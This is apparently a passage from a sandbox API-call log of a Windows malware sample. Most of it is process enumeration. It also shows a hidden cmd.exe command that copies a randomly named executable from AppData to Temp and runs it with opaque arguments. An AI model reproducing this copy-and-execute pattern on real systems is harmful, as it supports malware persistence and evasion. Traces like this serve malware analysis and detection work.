lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0112.099] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0112.100] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0112.101] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0112.102] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0112.104] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0112.105] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0112.106] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.107] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0112.108] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0112.109] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0112.110] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xcb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0112.111] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0112.112] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xcc0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0112.113] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0112.114] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xcec, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0112.115] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0112.116] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0112.117] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0112.118] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0112.119] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd2c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bkM66bYk.exe")) returned 1 [0112.120] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd2c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bkM66bYk.exe")) returned 0 [0112.121] CloseHandle (hObject=0xf8) returned 1 [0112.121] GetTickCount () returned 0x26d91 [0112.121] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc10 | out: lpPerformanceCount=0x12fc10*=16891009840) returned 1 [0112.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0112.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="v") returned 1 [0112.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="G") returned 1 [0112.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0112.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0112.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="c") returned 1 [0112.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="k") returned 1 [0112.121] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="x") returned 1 [0112.121] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x125bfcc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0112.121] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x38 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x38 [0112.121] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0112.121] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpszShortPath=0x125bfcc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0112.122] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x63 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x63 [0112.122] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0112.122] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" [PARAMS]", cchLength=0xb1 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\HVGO9CKX.EXE\" && \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\HVGO9CKX.EXE\" [PARAMS]") returned 0xb1 [0112.122] CharUpperBuffW (in: lpsz="[PARAMS]", cchLength=0x8 | out: lpsz="[PARAMS]") returned 0x8 [0112.122] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb2c*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb1c | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"", lpProcessInformation=0x12fb1c*(hProcess=0xf0, hThread=0xf8, dwProcessId=0xd68, dwThreadId=0xd6c)) returned 1 [0112.123] CloseHandle (hObject=0xf0) returned 1 [0112.123] CloseHandle (hObject=0xf8) returned 1 [0112.123] Sleep (dwMilliseconds=0xfa) [0112.425] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xf4 [0112.430] Process32FirstW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.431] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0112.431] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0112.432] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.433] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0112.434] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.434] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0112.435] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0112.436] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0112.437] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0112.438] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.439] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.440] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.441] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.441] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.442] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0112.443] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.444] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.446] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0112.447] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.449] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.450] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0112.451] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0112.452] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0112.454] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.455] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.456] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0112.457] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0112.458] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0112.460] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0112.461] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0112.462] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0112.463] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0112.465] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0112.466] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0112.467] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0112.468] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0112.635] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0112.636] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0112.637] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0112.638] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0112.639] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0112.640] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0112.641] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 